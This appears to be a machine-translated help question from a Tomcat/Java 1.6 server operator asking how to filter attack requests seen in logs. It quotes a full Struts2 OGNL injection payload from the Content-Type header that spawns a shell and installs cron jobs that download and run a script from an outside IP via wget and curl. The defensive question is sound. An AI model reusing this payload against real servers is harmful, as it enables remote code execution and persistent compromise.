我在tomcatstdout日志中注意到有人试图使用Tomcat 7和Java 1.6.0.45破解服务器暂时我们阻止了大范围的ip以避免攻击但是有一种更好的方法来防止这些请求。
有没有办法过滤这种类型的请求?
日志上的完整消息是:
GetRequestHTTP:FileUploadException请求不包含multipart / form-data或multipart / mixed流,内容类型标头是%{(#_ ='multipart / form-data')。(#dm = @ ognl。 OgnlContext @ DEFAULT_MEMBER_ACCESS)(#_ memberAccess(#_ memberAccess =#分米?):((#容器=#上下文[ 'com.opensymphony.xwork2.ActionContext.container'])(#ognlUtil =#container.getInstance(@com .opensymphony.xwork2.ognl.OgnlUtil @类))。(#ognlUtil.getExcludedPackageNames()。明确的())。(#ognlUtil.getExcludedClasses()。明确的())。(#context.setMemberAccess(#dm))) )。(#cmd ='echo'* / 20 * * * * wget -O - -q htp://5.188.87.12/icons/logo.jpg | sh \ n * / 19 * * * * curl {{3 “| crontab - ; wget -O - -q http://5.188.87.12/icons/logo.jpg|sh')。(#iswin =(@ java.lang.System@getProperty('os.name')。toLowerCase()。contains('win ')))(#CMDS =(#iswin?{' cmd.exe的”, '/ C',#CMD}:{ '/斌/庆典', ' - C',#CMD}))(#。 p = new java.lang.ProcessBuilder(#cmds))。(#p.redirectErrorStream(true))。(#process =#p.start())。(#ros =(@ org.apache.struts2.ServletActionContext @ GETRESPONSE()的getOutputStream()))。(@ org.apache.commo ns.io.IOUtils@copy(#process.getInputStream(),#ROS))。(#ros.flush())}